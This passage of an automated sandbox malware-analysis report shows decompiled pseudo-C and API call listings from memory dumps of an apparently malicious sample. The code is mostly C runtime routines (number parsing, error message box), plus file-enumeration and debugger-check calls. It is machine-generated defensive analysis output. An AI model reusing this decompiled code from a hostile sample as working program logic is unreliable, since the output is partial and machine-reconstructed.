      									case 2:
      										__eflags = __al - 0x31 - 8;
      										if(__al - 0x31 <= 8) {
      											L12:
      											_push(3);
      											goto L13;
      										}
      										_a32 =  *_a32;
      										__ecx =  *( *_a32 + 0xbc);
      										__ecx =  *( *( *_a32 + 0xbc));
      										__eflags = __al -  *__ecx;
      										if(__al ==  *__ecx) {
      											L15:
      											_push(5);
      											goto L16;
      										}
      										__eflags = __al - __bl;
      										if(__al == __bl) {
      											L20:
      											_t271 = _t328;
      											goto L9;
      										}
      										goto L38;
      									case 3:
      										_v92 = __esi;
      										while(1) {
      											__eflags = __al - __bl;
      											if(__al < __bl) {
      												break;
      											}
      											__eflags = __al - 0x39;
      											if(__al > 0x39) {
      												break;
      											}
      											__eflags = _v80 - 0x19;
      											if(_v80 >= 0x19) {
      												_t36 =  &_v84;
      												 *_t36 = _v84 + 1;
      												__eflags =  *_t36;
      											} else {
      												_v80 = _v80 + 1;
      												 *__edi = __al;
      												__edi = __edi + 1;
      											}
      											__al =  *__edx;
      											__edx = __edx + 1;
      											__eflags = __edx;
      										}
      										_a32 =  *_a32;
      										__ecx =  *( *_a32 + 0xbc);
      										__ecx =  *( *( *_a32 + 0xbc));
      										__eflags = __al -  *__ecx;
      										if(__al ==  *__ecx) {
      											L25:
      											_push(4);
      											goto L16;
      										}
      										goto L47;
      									case 4:
      										__eflags = _v80;
      										_v92 = __esi;
      										_v96 = __esi;
      										if(_v80 != 0) {
      											while(1) {
      												L59:
      												__eflags = __al - __bl;
      												if(__al < __bl) {
      													break;
      												}
      												__eflags = __al - 0x39;
      												if(__al > 0x39) {
      													L47:
      													__eflags = __al - 0x2b;
      													if(__al == 0x2b) {
      														L34:
      														__edx = __edx - 1;
      														_push(0xb);
      														goto L16;
      													}
      													__eflags = __al - 0x2d;
      													if(__al == 0x2d) {
      														goto L34;
      													}
      													L29:
      													__eflags = __al - 0x43;
      													if(__al <= 0x43) {
      														goto L76;
      													}
      													__eflags = __al - 0x45;
      													if(__al <= 0x45) {
      														L33:
      														_push(6);
      														goto L16;
      													}
      													__eflags = __al - 0x63;
      													if(__al <= 0x63) {
      														goto L76;
      													}
      													__eflags = __al - 0x65;
      													if(__al > 0x65) {
      														goto L76;
      													}
      													goto L33;
      												}
      												__eflags = _v80 - 0x19;
      												if(_v80 < 0x19) {
      													_v80 = _v80 + 1;
      													 *__edi = __al;
      													__edi = __edi + 1;
      													_t48 =  &_v84;
      													 *_t48 = _v84 - 1;
      													__eflags =  *_t48;
      												}
      												__al =  *__edx;
      												__edx = __edx + 1;
      												__eflags = __edx;
      											}
      											goto L47;
      										}
      										while(1) {
      											__eflags = __al - __bl;
      											if(__al != __bl) {
      												break;
      											}
      											_v84 = _v84 - 1;
      											__al =  *__edx;
      											__edx = __edx + 1;
      											__eflags = __edx;
      										}
      										goto L59;
      									case 5:
      										__al = __al - __bl;
      										__eflags = __al - 9;
      										_v96 = __esi;
      										if(__al > 9) {
      											goto L38;
      										}
      										_push(4);
      										goto L13;
      									case 6:
      										__ecx = __edx - 2;
      										_v88 = __ecx;
      										__eflags = __al - 0x31 - 8;
      										if(__al - 0x31 > 8) {
      											__eax = __al;
      											__eax = __al - 0x2b;
      											__eflags = __eax;
      											if(__eax == 0) {
      												goto L71;
      											}
      											__eax = __eax - 1;
      											__eax = __eax - 1;
      											__eflags = __eax;
      											if(__eax == 0) {
      												goto L70;
      											}
      											__eax = __eax - 3;
      											__eflags = __eax;
      											goto L68;
      										}
      										goto L64;
      									case 7:
      										__eflags = __al - 0x31 - 8;
      										if(__al - 0x31 <= 8) {
      											goto L64;
      										}
      										__eflags = __al - __bl;
      										L68:
      										if(__eflags != 0) {
      											L38:
      											__edx = _v88;
      											goto L83;
      										}
      										_push(8);
      										goto L16;
      									case 8:
      										_v100 = __esi;
      										while(1) {
      											__eflags = __al - __bl;
      											if(__al != __bl) {
      												break;
      											}
      											__al =  *__edx;
      											__edx = __edx + 1;
      											__eflags = __edx;
      										}
      										__al = __al - 0x31;
      										__eflags = __al - 8;
      										if(__al <= 8) {
      											L64:
      											_push(9);
      											L13:
      											_pop(_t271);
      											_t309 = _t309 - 1;
      											goto L9;
      										}
      										goto L76;
      									case 9:
      										_v100 = __esi;
      										__ecx = 0;
      										while(1) {
      											__eflags = __al - __bl;
      											if(__al < __bl) {
      												break;
      											}
      											__eflags = __al - 0x39;
      											if(__al > 0x39) {
      												L100:
      												_v104 = __ecx;
      												while(1) {
      													__eflags = __al - __bl;
      													if(__al < __bl) {
      														break;
      													}
      													__eflags = __al - 0x39;
      													if(__al > 0x39) {
      														L76:
      														_t309 = _t309 - 1;
      														goto L83;
      													}
      													__al =  *__edx;
      													__edx = __edx + 1;
      													__eflags = __edx;
      												}
      												goto L76;
      											}
      											__ecx = __ecx * 0xa;
      											__esi = __al;
      											__ecx = __ecx + __esi - 0x30;
      											__eflags = __ecx - 0x1450;
      											if(__ecx > 0x1450) {
      												__ecx = 0x1451;
      												goto L100;
      											}
      											__al =  *__edx;
      											__edx = __edx + 1;
      											__eflags = __edx;
      										}
      										goto L100;
      									case 0xa:
      										goto L91;
      									case 0xb:
      										__eflags = _a28;
      										if(_a28 == 0) {
      											_push(0xa);
      											_pop(__ecx);
      											__edx = __edx - 1;
      											__eflags = __edx;
      											goto L91;
      										}
      										__eax = __al;
      										__eax = __al - 0x2b;
      										__eflags = __eax;
      										__ecx = __edx - 1;
      										_v88 = __ecx;
      										if(__eax == 0) {
      											L71:
      											_push(7);
      											L16:
      											_pop(_t271);
      											goto L9;
      										}
      										__eax = __eax - 1;
      										__eax = __eax - 1;
      										__eflags = __eax;
      										if(__eax == 0) {
      											L70:
      											_v108 = _v108 | 0xffffffff;
      											_push(7);
      											_pop(__ecx);
      											goto L9;
      										}
      										__edx = __ecx;
      										L83:
      										__eflags = _v92;
      										 *_v116 = _t309;
      										if(_v92 == 0) {
      											_v112 = 4;
      											L179:
      											_t272 = 0;
      											_t236 = 0;
      											_t308 = 0;
      											_t328 = 0;
      											__eflags = 0;
      											L180:
      											_t320 = _v128;
      											_t237 = _t236 | _v120;
      											__eflags = _t237;
      											 *_t320 = _t272;
      											_t320[2] = _t237;
      											_t238 = _v112;
      											_t320[0] = _t328;
      											_t320[1] = _t308;
      											goto L181;
      										}
      										_push(0x18);
      										_pop(_t240);
      										__eflags = _v80 - _t240;
      										if(_v80 > _t240) {
      											__eflags = _v13 - 5;
      											if(_v13 >= 5) {
      												_t63 =  &_v13;
      												 *_t63 = _v13 + 1;
      												__eflags =  *_t63;
      											}
      											_t320 = _t320 - 1;
      											_t65 =  &_v84;
      											 *_t65 = _v84 + 1;
      											__eflags =  *_t65;
      											_v80 = _t240;
      										}
      										__eflags = _v80;
      										if(_v80 <= 0) {
      											goto L179;
      										} else {
      											while(1) {
      												_t320 = _t320 - 1;
      												__eflags =  *_t320;
      												if( *_t320 != 0) {
      													break;
      												}
      												_v80 = _v80 - 1;
      												_t75 =  &_v84;
      												 *_t75 = _v84 + 1;
      												__eflags =  *_t75;
      											}
      											E004160BE( &_v36, _v80,  &_v64);
      											_t244 = _v104;
      											__eflags = _v108;
      											if(_v108 < 0) {
      												_t244 =  ~_t244;
      											}
      											_t245 = _t244 + _v84;
      											__eflags = _v100;
      											if(_v100 == 0) {
      												_t245 = _t245 + _a20;
      												__eflags = _t245;
      											}
      											__eflags = _v96;
      											if(_v96 == 0) {
      												_t245 = _t245 - _a24;
      												__eflags = _t245;
      											}
      											__eflags = _t245 - 0x1450;
      											if(_t245 > 0x1450) {
      												_t328 = 0;
      												_t236 = 0x7fff;
      												_t308 = 0x80000000;
      												_t272 = 0;
      												_v112 = 2;
      												goto L180;
      											} else {
      												__eflags = _t245 - 0xffffebb0;
      												if(_t245 < 0xffffebb0) {
      													_v112 = 1;
      													goto L179;
      												}
      												_t330 = 0x42ccd0;
      												__eflags = _t245;
      												_v88 = _t245;
      												if(__eflags == 0) {
      													L175:
      													_t272 = _v64 & 0x0000ffff;
      													_t328 = _v62;
      													_t308 = _v58;
      													_t236 = _v56 >> 0x10;
      													goto L180;
      												}
      												if(__eflags < 0) {
      													_v88 =  ~_t245;
      													_t330 = 0x42ce30;
      													__eflags = 0x42ce90;
      												}
      												__eflags = _a16;
      												if(_a16 == 0) {
      													_v64 = 0;
      												}
      												__eflags = _v88;
      												if(_v88 != 0) {
      													do {
      														_v88 = _v88 >> 3;
      														_t330 = _t330 + 0x54;
      														_t248 = _v88 & 0x00000007;
      														__eflags = _t248;
      														_v80 = _t330;
      														if(_t248 == 0) {
      															goto L174;
      														}
      														_t266 = _t248 * 0xc + _t330;
      														__eflags =  *_t266 - 0x8000;
      														_v116 = _t266;
      														if( *_t266 >= 0x8000) {
      															asm("movsd");
      															asm("movsd");
      															asm("movsd");
      															_t98 =  &_v74;
      															 *_t98 = _v74 - 1;
      															__eflags =  *_t98;
      															_t330 = _v80;
      															_t266 =  &_v76;
      															_v116 = _t266;
      														}
      														_t310 =  *(_t266 + 0xa) & 0x0000ffff;
      														_t276 = _v54;
      														_v84 = 0;
      														_v48 = 0;
      														_v44 = 0;
      														_v40 = 0;
      														_t277 = _t276 & 0x00007fff;
      														_t311 = _t310 & 0x00007fff;
      														_t254 = (_t310 ^ _t276) & 0x00008000;
      														__eflags = _t277 - 0x7fff;
      														_t323 = _t311 + _t277 & 0x0000ffff;
      														if(_t277 >= 0x7fff) {
      															L172:
      															asm("sbb eax, eax");
      															_v60 = _v60 & 0x00000000;
      															_t257 = ( ~_t254 & 0x80000000) + 0x7fff8000;
      															_t211 =  &_v64;
      															 *_t211 = _v64 & 0x00000000;
      															__eflags =  *_t211;
      															goto L173;
      														} else {
      															__eflags = _t311 - 0x7fff;
      															if(_t311 >= 0x7fff) {
      																goto L172;
      															}
      															__eflags = _t323 - 0xbffd;
      															if(_t323 > 0xbffd) {
      																goto L172;
      															}
      															__eflags = _t323 - 0x3fbf;
      															if(_t323 > 0x3fbf) {
      																__eflags = _t277;
      																if(_t277 != 0) {
      																	L134:
      																	__eflags = _t311;
      																	if(_t311 != 0) {
      																		L139:
      																		_t126 =  &_v108;
      																		 *_t126 = _v108 & 0;
      																		__eflags =  *_t126;
      																		_t331 =  &_v44;
      																		_v92 = 5;
      																		do {
      																			_t312 = _v92;
      																			_t280 = _v108 + _v108;
      																			__eflags = _t312;
      																			_v104 = _t312;
      																			if(_t312 <= 0) {
      																				goto L149;
      																			}
      																			_t267 = _t266 + 8;
      																			__eflags = _t267;
      																			_v96 = _t339 + _t280 - 0x3c;
      																			_v100 = _t267;
      																			do {
      																				_v124 = _v124 & 0x00000000;
      																				_t301 = ( *_v100 & 0x0000ffff) * ( *_v96 & 0x0000ffff);
      																				_t319 =  *((intOrPtr*)(_t331 - 4));
      																				_t268 = _t319 + _t301;
      																				__eflags = _t268 - _t319;
      																				if(_t268 < _t319) {
      																					L144:
      																					_v124 = 1;
      																					goto L145;
      																				}
      																				__eflags = _t268 - _t301;
      																				if(_t268 >= _t301) {
      																					goto L145;
      																				}
      																				goto L144;
      																				L145:
      																				__eflags = _v124;
      																				 *((intOrPtr*)(_t331 - 4)) = _t268;
      																				if(_v124 != 0) {
      																					 *_t331 =  *_t331 + 1;
      																					__eflags =  *_t331;
      																				}
      																				_v96 = _v96 + 2;
      																				_v100 = _v100 - 2;
      																				_v104 = _v104 - 1;
      																				__eflags = _v104;
      																			} while (_v104 > 0);
      																			_t266 = _v116;
      																			L149:
      																			_t331 =  &(_t331[0]);
      																			_v108 = _v108 + 1;
      																			_v92 = _v92 - 1;
      																			__eflags = _v92;
      																		} while (_v92 > 0);
      																		_t325 = _t323 + 0xc002;
      																		__eflags = _t325;
      																		if(_t325 <= 0) {
      																			L154:
      																			_t325 = _t325 + 0xffff;
      																			__eflags = _t325;
      																			if(_t325 >= 0) {
      																				L161:
      																				__eflags = _v48 - 0x8000;
      																				if(_v48 > 0x8000) {
      																					L163:
      																					__eflags = _v46 - 0xffffffff;
      																					if(_v46 != 0xffffffff) {
      																						_t199 =  &_v46;
      																						 *_t199 = _v46 + 1;
      																						__eflags =  *_t199;
      																					} else {
      																						_v46 = _v46 & 0x00000000;
      																						__eflags = _v42 - 0xffffffff;
      																						if(_v42 != 0xffffffff) {
      																							_v42 = _v42 + 1;
      																						} else {
      																							_v42 = _v42 & 0x00000000;
      																							__eflags = _v38 - 0xffff;
      																							if(_v38 != 0xffff) {
      																								_v38 = _v38 + 1;
      																							} else {
      																								_v38 = 0x8000;
      																								_t325 = _t325 + 1;
      																							}
      																						}
      																					}
      																					L170:
      																					__eflags = _t325 - 0x7fff;
      																					_t330 = _v80;
      																					if(_t325 >= 0x7fff) {
      																						goto L172;
      																					}
      																					_v64 = _v46;
      																					_v62 = _v44;
      																					_v58 = _v40;
      																					_v54 = _t325 | _t254;
      																					goto L174;
      																				}
      																				__eflags = (_v48 & 0x0001ffff) - 0x18000;
      																				if((_v48 & 0x0001ffff) != 0x18000) {
      																					goto L170;
      																				}
      																				goto L163;
      																			}
      																			_t333 =  ~_t325 & 0x0000ffff;
      																			_t325 = _t325 + _t333;
      																			__eflags = _t325;
      																			do {
      																				__eflags = _v48 & 0x00000001;
      																				if((_v48 & 0x00000001) != 0) {
      																					_t172 =  &_v84;
      																					 *_t172 = _v84 + 1;
      																					__eflags =  *_t172;
      																				}
      																				_v40 = _v40 >> 1;
      																				_t266 = _v44 >> 0x00000001 | _v40 << 0x0000001f;
      																				_t333 = _t333 - 1;
      																				__eflags = _t333;
      																				_v44 = _v44 >> 0x00000001 | _v40 << 0x0000001f;
      																				_v48 = _v48 >> 0x00000001 | _v44 << 0x0000001f;
      																			} while (_t333 != 0);
      																			__eflags = _v84;
      																			if(_v84 != 0) {
      																				_t183 =  &_v48;
      																				 *_t183 = _v48 | 0x00000001;
      																				__eflags =  *_t183;
      																			}
      																			goto L161;
      																		} else {
      																			goto L151;
      																		}
      																		while(1) {
      																			L151:
      																			__eflags = _v40 & 0x80000000;
      																			if((_v40 & 0x80000000) != 0) {
      																				break;
      																			}
      																			_t334 = _v44;
      																			_v48 = _v48 << 1;
      																			_t325 = _t325 + 0xffff;
      																			__eflags = _t325;
      																			_v44 = _t334 + _t334 | _v48 >> 0x0000001f;
      																			_v40 = _v40 + _v40 | _t334 >> 0x0000001f;
      																			if(_t325 > 0) {
      																				continue;
      																			}
      																			break;
      																		}
      																		__eflags = _t325;
      																		if(_t325 > 0) {
      																			goto L161;
      																		}
      																		goto L154;
      																	}
      																	_t323 = _t323 + 1;
      																	__eflags =  *(_t266 + 8) & 0x7fffffff;
      																	if(( *(_t266 + 8) & 0x7fffffff) != 0) {
      																		goto L139;
      																	}
      																	__eflags =  *(_t266 + 4);
      																	if( *(_t266 + 4) != 0) {
      																		goto L139;
      																	}
      																	__eflags =  *_t266;
      																	if( *_t266 != 0) {
      																		goto L139;
      																	}
      																	_v56 = 0;
      																	_v60 = 0;
      																	_v64 = 0;
      																	goto L174;
      																}
      																_t323 = _t323 + 1;
      																__eflags = _v56 & 0x7fffffff;
      																if((_v56 & 0x7fffffff) != 0) {
      																	goto L134;
      																}
      																__eflags = _v60;
      																if(_v60 != 0) {
      																	goto L134;
      																}
      																__eflags = _v64;
      																if(_v64 != 0) {
      																	goto L134;
      																}
      																_v54 = _v54 & _t277;
      																goto L174;
      															}
      															_t257 = 0;
      															_v60 = 0;
      															_v64 = 0;
      															L173:
      															_v56 = _t257;
      														}
      														L174:
      														__eflags = _v88;
      													} while (_v88 != 0);
      												}
      												goto L175;
      											}
      										}
      								}
      							}
      							L91:
      							__eflags = _t271 - 0xa;
      							if(_t271 != 0xa) {
      								goto L9;
      							}
      							goto L83;
      						}
      						L7:
      						_t309 = _t309 + 1;
      					}
      				} else {
      					_t264 = E0040D198(_t343);
      					_push(0);
      					_push(0);
      					_push(0);
      					_push(0);
      					_push(0);
      					 *_t264 = 0x16;
      					E0040CB22(0, __edx,  &_v36);
      					_t238 = 0;
      					L181:
      					return E0040FE9A(_t238, _t266, _v8 ^ _t339, _t308, _t320, _t328);
      				}
      			}













































      0x00000000
      0x00414dad
      0x00414db2
      0x00414dc1
      0x00414dc4
      0x00414de5
      0x00414de7
      0x00414dea
      0x00414e0d
      0x00414e0d
      0x00414e0d
      0x00414e0d
      0x00414e10
      0x00414e13
      0x00414e1a
      0x00414e1d
      0x00414e20
      0x00414e22
      0x00414e24
      0x00414e27
      0x00000000
      0x00000000
      0x00414e2d
      0x00414e2d
      0x00414e30
      0x00414e33
      0x00414e36
      0x00414e42
      0x00414e46
      0x00414e49
      0x00414e4c
      0x00414e4f
      0x00414e51
      0x00414e57
      0x00414e57
      0x00000000
      0x00414e57
      0x00414e53
      0x00414e55
      0x00000000
      0x00000000
      0x00000000
      0x00414e5e
      0x00414e5e
      0x00414e62
      0x00414e65
      0x00414e67
      0x00414e67
      0x00414e67
      0x00414e6a
      0x00414e6e
      0x00414e72
      0x00414e75
      0x00414e75
      0x00414e7b
      0x00414e7e
      0x00414e7f
      0x00414e80
      0x00414e83
      0x00414e86
      0x00414e86
      0x00414e8c
      0x00414e92
      0x00414e95
      0x00414ed2
      0x00414ed2
      0x00414ed8
      0x00414edb
      0x00414f20
      0x00414f20
      0x00414f26
      0x00414f39
      0x00414f39
      0x00414f3d
      0x00414f69
      0x00414f69
      0x00414f69
      0x00414f3f
      0x00414f3f
      0x00414f43
      0x00414f47
      0x00414f64
      0x00414f49
      0x00414f49
      0x00414f4d
      0x00414f53
      0x00414f5e
      0x00414f55
      0x00414f55
      0x00414f5b
      0x00414f5b
      0x00414f53
      0x00414f47
      0x00414f6c
      0x00414f6c
      0x00414f71
      0x00414f74
      0x00000000
      0x00000000
      0x00414f7a
      0x00414f81
      0x00414f89
      0x00414f8c
      0x00000000
      0x00414f8c
      0x00414f31
      0x00414f37
      0x00000000
      0x00000000
      0x00000000
      0x00414f37
      0x00414ee1
      0x00414ee4
      0x00414ee4
      0x00414ee6
      0x00414ee6
      0x00414eea
      0x00414eec
      0x00414eec
      0x00414eec
      0x00414eec
      0x00414ef8
      0x00414f00
      0x00414f0c
      0x00414f0c
      0x00414f0d
      0x00414f10
      0x00414f10
      0x00414f15
      0x00414f19
      0x00414f1b
      0x00414f1b
      0x00414f1b
      0x00414f1b
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00414e97
      0x00414e97
      0x00414e97
      0x00414e9e
      0x00000000
      0x00000000
      0x00414ea0
      0x00414ea6
      0x00414ebc
      0x00414ec2
      0x00414ec5
      0x00414ec8
      0x00414ecb
      0x00000000
      0x00000000
      0x00000000
      0x00414ecb
      0x00414ecd
      0x00414ed0
      0x00000000
      0x00000000
      0x00000000
      0x00414ed0
      0x00414dec
      0x00414ded
      0x00414df4
      0x00000000
      0x00000000
      0x00414df6
      0x00414df9
      0x00000000
      0x00000000
      0x00414dfb
      0x00414dfd
      0x00000000
      0x00000000
      0x00414dff
      0x00414e02
      0x00414e05
      0x00000000
      0x00414e05
      0x00414dc6
      0x00414dc7
      0x00414dce
      0x00000000
      0x00000000
      0x00414dd0
      0x00414dd4
      0x00000000
      0x00000000
      0x00414dd6
      0x00414dda
      0x00000000
      0x00000000
      0x00414ddc
      0x00000000
      0x00414ddc
      0x00414db4
      0x00414db6
      0x00414db9
      0x00414fa9
      0x00414fa9
      0x00414fa9
      0x00414fac
      0x00414fac
      0x00414fac
      0x00414d22
      0x00000000
      0x00414d1c
      0x00414cdd
      0x00000000
      0x00414a1c
      0x00414c4b
      0x00414c4b
      0x00414c4e
      0x00000000
      0x00000000
      0x00000000
      0x00414c54
      0x00414a0b
      0x00414a0b
      0x00414a0b
      0x004149d4
      0x004149d4
      0x004149d9
      0x004149da
      0x004149db
      0x004149dc
      0x004149dd
      0x004149de
      0x004149e4
      0x004149ec
      0x0041500d
      0x0041501b
      0x0041501b

      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
      • String ID:
      • API String ID: 2579439406-0
      • Opcode ID: 3a3e26d4e0284980631ff1f4d077d6771db4f8c1a99e6c9ea26b0010a9d14bdd
      • Instruction ID: be2820b812828461db64683cad85a0873d12b28c68765580b26a87767bbd0006
      • Opcode Fuzzy Hash: 3a3e26d4e0284980631ff1f4d077d6771db4f8c1a99e6c9ea26b0010a9d14bdd
      • Instruction Fuzzy Hash: 5E227731E442088BDF24CFA8C4503EEBBB2FB99315F65812BD456AB385D77858C6CB49
      C-Code - Quality: 68%
      			E00402F20(void* __ebx, void* __edi, void* __esi) {
      				intOrPtr _t14;
      				intOrPtr _t18;
      				void* _t19;
      				void* _t20;
      
      				_push(E00402F74);
      				_push( *[fs:0x0]);
      				 *((intOrPtr*)(_t20 + 0x10)) = _t18;
      				_t19 = _t20 + 0x10;
      				 *((intOrPtr*)(_t19 - 0x18)) = _t20 -  *((intOrPtr*)(_t20 + 0x10));
      				_push( *((intOrPtr*)(_t19 - 8)));
      				 *((intOrPtr*)(_t19 - 4)) = 0xffffffff;
      				 *((intOrPtr*)(_t19 - 8)) =  *((intOrPtr*)(_t19 - 4));
      				_t9 = _t19 - 0x10; // -16
      				_t14 = _t9;
      				 *[fs:0x0] = _t14;
      				return _t14;
      			}







      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 37c95a67a94664cdbf0f61c5e2434afc347c4625af5a5a7507b5e1067c153ece
      • Instruction ID: fd0c152cdb07e373f2f2774d870df907db34f929ce6419e756e40dd329f785f5
      • Opcode Fuzzy Hash: 37c95a67a94664cdbf0f61c5e2434afc347c4625af5a5a7507b5e1067c153ece
      • Instruction Fuzzy Hash: 59E0E5B5900789EFCB10CF98C980A9EBBF8FB45650F100A5AF460D3280D3349A048B91
      APIs
      • memset.NTDLL ref: 002D3EDA
      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002D3F0C
      • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002D3F20
      • CloseHandle.KERNEL32(?), ref: 002D3F37
      • lstrcat.KERNEL32(?,002DC6A3), ref: 002D3F7D
      • FindNextFileA.KERNEL32(002DA05C,?), ref: 002D3FC5
      • StrChrA.SHLWAPI(?,0000002E), ref: 002D4033
      • memcpy.NTDLL(?,?,00000000), ref: 002D406C
      • FindNextFileA.KERNEL32(002DA05C,?), ref: 002D4081
      • CompareFileTime.KERNEL32(?,?), ref: 002D40AA
      • HeapFree.KERNEL32(00000000,?), ref: 002D40F1
      • HeapFree.KERNEL32(00000000,?), ref: 002D4101
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: File$FindFreeHeapNextTime$CloseCompareCreateHandlelstrcatmemcpymemset
      • String ID: Fv$pnls$}nls
      • API String ID: 293928577-1697535189
      • Opcode ID: b91fa7646e8632be2f07451c6757ad543c5e30d23ee16f7f3b35b34727b96603
      • Instruction ID: c56f93c7f86f224e8b9a105f5e05d076edb75c7aa4a69dc23ea522616ff87873
      • Opcode Fuzzy Hash: b91fa7646e8632be2f07451c6757ad543c5e30d23ee16f7f3b35b34727b96603
      • Instruction Fuzzy Hash: C3814972D1020AEFDB119FA5DC48AEEBBB9FB48301F10416AE605E2250D7719E54CF60
      C-Code - Quality: 65%
      			E0040ED95(intOrPtr _a4) {
      				long _v4;
      				void* __ebx;
      				void* __ecx;
      				void* __edi;
      				void* _t9;
      				int _t11;
      				void* _t14;
      				void* _t16;
      				void* _t18;
      				void* _t19;
      				void* _t24;
      				void* _t26;
      				intOrPtr _t30;
      				void* _t34;
      				void* _t37;
      				signed int _t38;
      				void** _t40;
      				void* _t42;
      				void* _t45;
      				void* _t48;
      				void* _t49;
      				void* _t50;
      				void* _t51;
      
      				_t30 = _a4;
      				_t38 = 0;
      				while(_t30 !=  *((intOrPtr*)(0x42c328 + _t38 * 8))) {
      					_t38 = _t38 + 1;
      					if(_t38 < 0x17) {
      						continue;
      					}
      					break;
      				}
      				if(_t38 >= 0x17) {
      					return _t9;
      				}
      				if(E00412544(_t30, _t37, _t38, 3) == 1) {
      					L22:
      					_t11 = GetStdHandle(0xfffffff4);
      					_t45 = _t11;
      					__eflags = _t45;
      					if(_t45 != 0) {
      						__eflags = _t45 - 0xffffffff;
      						if(_t45 != 0xffffffff) {
      							_t40 = 0x42c32c + _t38 * 8;
      							_t11 = WriteFile(_t45,  *_t40, E0040CCD0( *_t40),  &_v4, 0);
      						}
      					}
      					L25:
      					return _t11;
      				}
      				_t11 = E00412544(_t30, _t37, _t38, 3);
      				_pop(_t34);
      				if(_t11 != 0 ||  *0x42c050 != 1) {
      					if(_t30 == 0xfc) {
      						goto L25;
      					} else {
      						_t14 = E0040D0F8(_t37, 0x436218, 0x314, "Runtime Error!\n\nProgram: ");
      						_t49 = _t48 + 0xc;
      						_t61 = _t14;
      						if(_t14 != 0) {
      							_push(0);
      							_push(0);
      							_push(0);
      							_push(0);
      							_push(0);
      							E0040CA26(0x314, _t34, _t37, _t38, _t61);
      							_t49 = _t49 + 0x14;
      						}
      						 *0x436335 = 0;
      						if(GetModuleFileNameA(0, 0x436231, 0x104) == 0) {
      							_t26 = E0040D0F8(_t37, 0x436231, 0x2fb, "<program name unknown>");
      							_t49 = _t49 + 0xc;
      							if(_t26 != 0) {
      								_push(0);
      								_push(0);
      								_push(0);
      								_push(0);
      								_push(0);
      								E0040CA26(0x314, _t34, _t37, _t38, 0);
      								_t49 = _t49 + 0x14;
      							}
      						}
      						_t16 = E0040CCD0(0x436231);
      						_pop(_t35);
      						if(_t16 + 1 <= 0x3c) {
      							L16:
      							_t42 = 0;
      							__eflags = 0;
      							goto L17;
      						} else {
      							_t23 = E0040CCD0(0x436231) + 0x4361f6;
      							_t35 = 0x43652c - E0040CCD0(0x436231) + 0x4361f6;
      							_t24 = E00412491(_t37, _t23, 0x43652c - E0040CCD0(0x436231) + 0x4361f6, "...", 3);
      							_t49 = _t49 + 0x14;
      							_t66 = _t24;
      							if(_t24 == 0) {
      								goto L16;
      							}
      							_t42 = 0;
      							_push(0);
      							_push(0);
      							_push(0);
      							_push(0);
      							_push(0);
      							E0040CA26(0x314, _t35, _t37, _t38, _t66);
      							_t49 = _t49 + 0x14;
      							L17:
      							_t18 = E00412420(_t37, 0x436218, 0x314, "\n\n");
      							_t50 = _t49 + 0xc;
      							_t67 = _t18;
      							if(_t18 != 0) {
      								_push(_t42);
      								_push(_t42);
      								_push(_t42);
      								_push(_t42);
      								_push(_t42);
      								E0040CA26(0x314, _t35, _t37, _t38, _t67);
      								_t50 = _t50 + 0x14;
      							}
      							_t19 = E00412420(_t37, 0x436218, 0x314,  *(0x42c32c + _t38 * 8));
      							_t51 = _t50 + 0xc;
      							_t68 = _t19;
      							if(_t19 != 0) {
      								_push(_t42);
      								_push(_t42);
      								_push(_t42);
      								_push(_t42);
      								_push(_t42);
      								E0040CA26(0x314, _t35, _t37, _t38, _t68);
      								_t51 = _t51 + 0x14;
      							}
      							_t11 = E00412282(_t37, 0x436218, "Microsoft Visual C++ Runtime Library", 0x12010);
      							goto L25;
      						}
      					}
      				} else {
      					goto L22;
      				}
      			}


























      APIs
      • GetModuleFileNameA.KERNEL32(00000000,00436231,00000104,0040FA78,00000001,00000214), ref: 0040EE2E
      • _strlen.LIBCMT ref: 0040EE5F
      • _strlen.LIBCMT ref: 0040EE6C
        • Part of subcall function 00412282: LoadLibraryA.KERNEL32 ref: 004122AF
        • Part of subcall function 00412282: GetProcAddress.KERNEL32(00000000,MessageBoxA,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 004122CE
        • Part of subcall function 00412282: GetProcAddress.KERNEL32(00000000,00000000,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 004122E7
        • Part of subcall function 00412282: GetProcAddress.KERNEL32(00000000,00000000,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 004122FC
        • Part of subcall function 00412282: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA,?,?,?,00436218,0040EEF7,00436218), ref: 00412331
        • Part of subcall function 00412282: GetProcAddress.KERNEL32(00000000,GetProcessWindowStation,?,?,?,00436218,0040EEF7,00436218), ref: 00412349
        • Part of subcall function 0040CA26: IsDebuggerPresent.KERNEL32(?,?,0040EEF7), ref: 0040CAD0
        • Part of subcall function 0040CA26: SetUnhandledExceptionFilter.KERNEL32 ref: 0040CADA
        • Part of subcall function 0040CA26: UnhandledExceptionFilter.KERNEL32(?), ref: 0040CAE4
        • Part of subcall function 0040CA26: GetCurrentProcess.KERNEL32(C000000D,?,?,0040EEF7), ref: 0040CAFF
